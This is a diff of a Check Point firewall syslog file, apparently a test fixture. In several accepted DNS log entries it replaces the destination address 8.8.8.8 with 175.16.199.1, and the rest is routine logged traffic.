-<134>1 2020-03-29T16:59:44Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d400,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501184"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47519"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:59:44Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d400,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501184"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47519"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:59:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d409,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50076"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T16:59:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d409,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50077"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:00:03Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d413,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"137"; service:"137"; service_id:"nbname"; src:"192.168.1.94"]
@@ -1891,7 +1891,7 @@
 <134>1 2020-03-29T17:00:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d426,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50637"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:00:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d426,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"33828"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10231"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:00:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d427,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:00:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d42a,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501226"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60859"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:00:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d42a,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501226"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60859"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:00:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d42a,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"83.98.201.134"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35319"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:00:26Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d42a,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"174.138.9.187"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36152"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:00:27Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d42b,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"162.159.200.123"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36451"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
@@ -1923,7 +1923,7 @@
 <134>1 2020-03-29T17:01:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d481,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50087"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:01:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d481,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50088"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:01:54Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d482,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:02:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d499,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59860"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:02:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d499,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59860"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:02:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d49f,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"62674"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:02:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d49f,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60684"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10232"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:02:24Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d49f,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"62267"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
@@ -2010,7 +2010,7 @@
 <134>1 2020-03-29T17:02:50Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d4ba,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35440"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10244"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:02:50Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d4ba,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44721"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:02:50Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d4ba,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54724"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10245"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T17:02:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d4bd,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58832"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T17:02:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d4bd,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58832"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:02:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d4bd,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.83.198.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"40180"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43505"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:02:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d4bd,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44654"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:02:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d4bd,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34422"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"26825"; xlatesrc:"0.0.0.0"]
@@ -2097,9 +2097,9 @@
